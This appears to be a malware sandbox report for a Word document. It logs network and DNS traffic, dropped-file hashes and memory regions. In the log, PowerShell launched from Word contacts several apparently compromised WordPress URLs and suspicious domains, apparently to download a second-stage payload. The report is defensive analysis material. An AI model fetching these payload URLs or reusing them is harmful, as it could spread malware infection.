    HTTP Response

    204
  • 23.62.61.194:443
    https://www.bing.com/aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189
    tls, http2
    1.5kB
    5.4kB
    17
    12

    HTTP Request

    GET https://www.bing.com/aes/c.gif?RG=6e7988d151f34ab5bb010a5e9231d576&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T135156Z&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189

    HTTP Response

    200
  • 23.62.61.194:443
    https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.6kB
    6.3kB
    17
    12

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 23.62.61.162:443
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    tls, http
    WINWORD.EXE
    1.2kB
    5.9kB
    8
    8

    HTTP Request

    GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
    tls, http
    WINWORD.EXE
    2.2kB
    50.1kB
    29
    41

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
    tls, http
    WINWORD.EXE
    25.4kB
    754.1kB
    398
    545

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
    tls, http
    WINWORD.EXE
    2.5kB
    52.9kB
    34
    43

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
    tls, http
    WINWORD.EXE
    2.8kB
    39.7kB
    33
    34

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    tls, http
    WINWORD.EXE
    1.9kB
    41.0kB
    24
    35

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
    tls, http
    WINWORD.EXE
    2.6kB
    37.8kB
    31
    31

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
    tls, http
    WINWORD.EXE
    1.8kB
    37.6kB
    22
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    tls, http
    WINWORD.EXE
    2.4kB
    37.4kB
    30
    31

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
    tls, http
    WINWORD.EXE
    8.9kB
    273.9kB
    154
    204

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
    tls, http
    WINWORD.EXE
    2.4kB
    37.6kB
    30
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
    tls, http
    WINWORD.EXE
    2.0kB
    26.1kB
    23
    23

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
    tls, http
    WINWORD.EXE
    2.6kB
    38.9kB
    32
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
    tls, http
    WINWORD.EXE
    2.0kB
    37.0kB
    25
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
    tls, http
    WINWORD.EXE
    2.6kB
    37.0kB
    30
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    tls, http
    WINWORD.EXE
    2.6kB
    37.4kB
    30
    31

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
    tls, http
    WINWORD.EXE
    2.5kB
    41.7kB
    32
    35

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
    tls, http
    WINWORD.EXE
    8.9kB
    322.1kB
    147
    236

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
    tls, http
    WINWORD.EXE
    2.7kB
    70.8kB
    33
    58

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
    tls, http
    WINWORD.EXE
    2.4kB
    37.1kB
    30
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
    tls, http
    WINWORD.EXE
    2.1kB
    27.7kB
    24
    24

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
    tls, http
    WINWORD.EXE
    42.0kB
    1.2MB
    711
    845

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
    tls, http
    WINWORD.EXE
    138.1kB
    3.6MB
    2199
    2555

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
    tls, http
    WINWORD.EXE
    24.9kB
    753.7kB
    418
    548

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
    tls, http
    WINWORD.EXE
    109.8kB
    3.4MB
    1806
    2435

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
    tls, http
    WINWORD.EXE
    61.3kB
    1.9MB
    1105
    1335

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
    tls, http
    WINWORD.EXE
    1.5kB
    27.5kB
    16
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
    tls, http
    WINWORD.EXE
    1.5kB
    25.8kB
    16
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
    tls, http
    WINWORD.EXE
    1.5kB
    26.8kB
    16
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
    tls, http
    WINWORD.EXE
    1.5kB
    28.3kB
    16
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
    tls, http
    WINWORD.EXE
    1.5kB
    27.6kB
    16
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
    tls, http
    WINWORD.EXE
    2.0kB
    28.4kB
    18
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
    tls, http
    WINWORD.EXE
    1.5kB
    24.9kB
    15
    23

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
    tls, http
    WINWORD.EXE
    1.5kB
    27.1kB
    16
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
    tls, http
    WINWORD.EXE
    9.8kB
    290.4kB
    178
    213

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
    tls, http
    WINWORD.EXE
    9.9kB
    311.9kB
    173
    229

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
    tls, http
    WINWORD.EXE
    8.8kB
    284.9kB
    161
    209

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
    tls, http
    WINWORD.EXE
    54.5kB
    2.7MB
    1074
    1939

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
    tls, http
    WINWORD.EXE
    5.6kB
    274.6kB
    104
    202

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
    tls, http
    WINWORD.EXE
    19.7kB
    573.4kB
    301
    416

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
    tls, http
    WINWORD.EXE
    15.3kB
    669.1kB
    288
    485

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
    tls, http
    WINWORD.EXE
    24.1kB
    1.1MB
    486
    799

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
    tls, http
    WINWORD.EXE
    10.5kB
    236.5kB
    163
    174

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
    tls, http
    WINWORD.EXE
    78.2kB
    1.9MB
    1196
    1399

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
    tls, http
    WINWORD.EXE
    45.6kB
    1.4MB
    765
    978

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
    tls, http
    WINWORD.EXE
    108.1kB
    2.6MB
    1643
    1878

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
    tls, http
    WINWORD.EXE
    37.5kB
    990.2kB
    612
    715

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

    HTTP Response

    200
  • 171.244.51.31:443
    https://viettellogistics.com.vn/wp-content/oS4/
    tls, http
    powershell.exe
    830 B
    5.9kB
    9
    8

    HTTP Request

    GET https://viettellogistics.com.vn/wp-content/oS4/

    HTTP Response

    308
  • 185.189.51.191:80
    http://cococat.se/wp-admin/2Oaf/
    http
    powershell.exe
    304 B
    468 B
    5
    3

    HTTP Request

    GET http://cococat.se/wp-admin/2Oaf/

    HTTP Response

    301
  • 185.189.51.191:443
    cococat.se
    tls
    powershell.exe
    581 B
    3.2kB
    7
    6
  • 89.42.208.212:80
    http://andresirjan.ir/wp-admin/JSH/
    http
    powershell.exe
    1.1kB
    48.3kB
    22
    37

    HTTP Request

    GET http://andresirjan.ir/wp-admin/JSH/

    HTTP Response

    404
  • 185.239.210.245:443
    sptrade.com.br
    tls
    powershell.exe
    406 B
    610 B
    5
    4
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    13
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    86.4kB
    2.4MB
    1701
    1698

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    WINWORD.EXE
    73 B
    248 B
    1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.76.243

  • 8.8.8.8:53
    240.143.123.92.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    240.143.123.92.in-addr.arpa

  • 8.8.8.8:53
    240.76.109.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    240.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    243.76.109.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    243.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    dtyl.shop
    dns
    powershell.exe
    55 B
    112 B
    1
    1

    DNS Request

    dtyl.shop

  • 8.8.8.8:53
    73.31.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    73.31.126.40.in-addr.arpa

  • 8.8.8.8:53
    star-speed.vip
    dns
    powershell.exe
    60 B
    121 B
    1
    1

    DNS Request

    star-speed.vip

  • 8.8.8.8:53
    cshub123.cn
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    cshub123.cn

    DNS Response

    216.152.233.103

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
    143 B
    1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    194.61.62.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    194.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    94.65.42.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    94.65.42.20.in-addr.arpa

  • 8.8.8.8:53
    183.142.211.20.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    183.142.211.20.in-addr.arpa

  • 8.8.8.8:53
    metadata.templates.cdn.office.net
    dns
    WINWORD.EXE
    79 B
    231 B
    1
    1

    DNS Request

    metadata.templates.cdn.office.net

    DNS Response

    23.62.61.162
    23.62.61.184

  • 8.8.8.8:53
    binaries.templates.cdn.office.net
    dns
    WINWORD.EXE
    79 B
    202 B
    1
    1

    DNS Request

    binaries.templates.cdn.office.net

    DNS Response

    2.17.251.23
    2.17.251.32

  • 8.8.8.8:53
    162.61.62.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    162.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    23.251.17.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    23.251.17.2.in-addr.arpa

  • 8.8.8.8:53
    viettellogistics.com.vn
    dns
    powershell.exe
    69 B
    85 B
    1
    1

    DNS Request

    viettellogistics.com.vn

    DNS Response

    171.244.51.31

  • 8.8.8.8:53
    31.51.244.171.in-addr.arpa
    dns
    72 B
    161 B
    1
    1

    DNS Request

    31.51.244.171.in-addr.arpa

  • 8.8.8.8:53
    cococat.se
    dns
    powershell.exe
    56 B
    72 B
    1
    1

    DNS Request

    cococat.se

    DNS Response

    185.189.51.191

  • 8.8.8.8:53
    191.51.189.185.in-addr.arpa
    dns
    73 B
    102 B
    1
    1

    DNS Request

    191.51.189.185.in-addr.arpa

  • 8.8.8.8:53
    andresirjan.ir
    dns
    powershell.exe
    60 B
    76 B
    1
    1

    DNS Request

    andresirjan.ir

    DNS Response

    89.42.208.212

  • 8.8.8.8:53
    212.208.42.89.in-addr.arpa
    dns
    72 B
    99 B
    1
    1

    DNS Request

    212.208.42.89.in-addr.arpa

  • 8.8.8.8:53
    103.169.127.40.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    103.169.127.40.in-addr.arpa

  • 8.8.8.8:53
    sptrade.com.br
    dns
    powershell.exe
    60 B
    76 B
    1
    1

    DNS Request

    sptrade.com.br

    DNS Response

    185.239.210.245

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    245.210.239.185.in-addr.arpa
    dns
    74 B
    134 B
    1
    1

    DNS Request

    245.210.239.185.in-addr.arpa

  • 8.8.8.8:53
    91.90.14.23.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    91.90.14.23.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    73 B
    106 B
    1
    1

    DNS Request

    200.197.79.204.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD7A31.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c0zf43nw.p3w.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3260-7-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-1-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3260-4-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3260-5-0x00007FF81B96D000-0x00007FF81B96E000-memory.dmp

    Filesize

    4KB

  • memory/3260-6-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-9-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-8-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-0-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3260-10-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-12-0x00007FF7D9340000-0x00007FF7D9350000-memory.dmp

    Filesize

    64KB

  • memory/3260-11-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-14-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-13-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-18-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-19-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-17-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-15-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-16-0x00007FF7D9340000-0x00007FF7D9350000-memory.dmp

    Filesize

    64KB

  • memory/3260-572-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-32-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-75-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-599-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-595-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3260-3-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3260-92-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-2-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3260-561-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-565-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-31-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3260-598-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3260-597-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3260-596-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

    Filesize

    64KB

  • memory/3988-576-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3988-573-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

  • memory/3988-77-0x000001DC51AB0000-0x000001DC51AD2000-memory.dmp

    Filesize

    136KB

  • memory/3988-76-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

    Filesize

    2.0MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.